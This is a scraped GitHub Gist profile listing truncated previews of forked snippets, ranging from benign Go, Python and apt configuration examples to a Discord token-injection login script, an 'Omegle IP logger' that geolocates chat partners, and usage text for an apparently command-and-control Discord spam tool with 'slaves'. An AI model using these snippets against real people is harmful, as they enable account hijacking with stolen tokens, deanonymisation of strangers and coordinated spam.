Skip to content

Instantly share code, notes, and snippets.

View 1trackprojects1's full-sized avatar
🌎
:/

Track Projects 1trackprojects1

🌎
:/
View GitHub Profile
@1trackprojects1
1trackprojects1 / unmarshal_interface.go
Created February 9, 2023 00:48 — forked from tkrajina/unmarshal_interface.go
Unmarshal JSON to specific interface implementation
package main
import (
"encoding/json"
"fmt"
"reflect"
)
type Something interface{}
@1trackprojects1
1trackprojects1 / main.go
Created April 17, 2022 15:30 — forked from manishtpatel/main.go
GoLang Encrypt string to base64 and vice versa using AES encryption.
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/base64"
"fmt"
"io"
)
@1trackprojects1
1trackprojects1 / discord-token-logger.js
Created August 29, 2021 21:25 — forked from m-Phoenix852/discord-token-logger.js
Simple script to log in to discord account using token.
let token = "your token";
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
@1trackprojects1
1trackprojects1 / dexMD5.py
Last active March 9, 2021 22:01 — forked from masbog/dexMD5.py
get dex MD5 of WhatsApp Application and get WhatsApp Version from an APK file
#!/usr/bin/env python3
# tweak up from https://github.com/mgp25/classesMD5-64/blob/master/dexMD5.py
# build AXML library from https://github.com/kin9-0rz/apkutils
# add xml manifest parse for getting WhatsApp Version
# to use this $ python3 dexMD5.py apk/WhatsApp.apk
# Output :
# WhatsApp Version : 2.17.296
# WhatsApp ClassesDEX MD5 : b'YrJNPljM3TuNFPIOZ+jziw=='
#
# @MasBog
@1trackprojects1
1trackprojects1 / gmail_imap_example.py
Created December 11, 2020 04:42 — forked from robulouski/gmail_imap_example.py
Very basic example of using Python and IMAP to iterate over emails in a gmail folder/label. http://www.voidynullness.net/blog/2013/07/25/gmail-email-with-python-via-imap/
#!/usr/bin/env python
#
# Very basic example of using Python and IMAP to iterate over emails in a
# gmail folder/label. This code is released into the public domain.
#
# RKI July 2013
# http://www.voidynullness.net/blog/2013/07/25/gmail-email-with-python-via-imap/
#
import sys
import imaplib
@1trackprojects1
1trackprojects1 / OmegleIPLogger.txt
Created November 24, 2020 11:28
Log locations of users straight from Omegle! It logs IPs, Countries, Cities, Zipcode and even Regions.
function httpGetAsync(theUrl, callback) {
var xmlHttp = new XMLHttpRequest();
xmlHttp.onreadystatechange = function () {
if (xmlHttp.readyState == 4 && xmlHttp.status == 200)
callback(xmlHttp.responseText);
}
xmlHttp.open("GET", theUrl, true);
xmlHttp.send(null);
}
Usage:
please sudojoin [invitecode]
-> joins the host cnc to the server
please send [messagespam] [channel_id] [serverinvite]
-> spams the given channelid with the given message in the server with that invite
please slaves
-> shows the current slave number
@1trackprojects1
1trackprojects1 / sources.list
Created December 9, 2018 17:21 — forked from justbuchanan/sources.list
/etc/apt/sources.list from an Ubuntu 14.04 installation
#deb cdrom:[Ubuntu 14.04.3 LTS _Trusty Tahr_ - Beta amd64 (20150805)]/ trusty main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://us.archive.ubuntu.com/ubuntu/ trusty main restricted
deb-src http://us.archive.ubuntu.com/ubuntu/ trusty main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://us.archive.ubuntu.com/ubuntu/ trusty-updates main restricted
import sys
import time
def load(t):
animation = "*+-+-*" # New Loading Vars : "!#$%^&*"
for i in range(t):
time.sleep(0.05)
sys.stdout.write("\rLoading: " + animation[i % len(animation)])
sys.stdout.flush()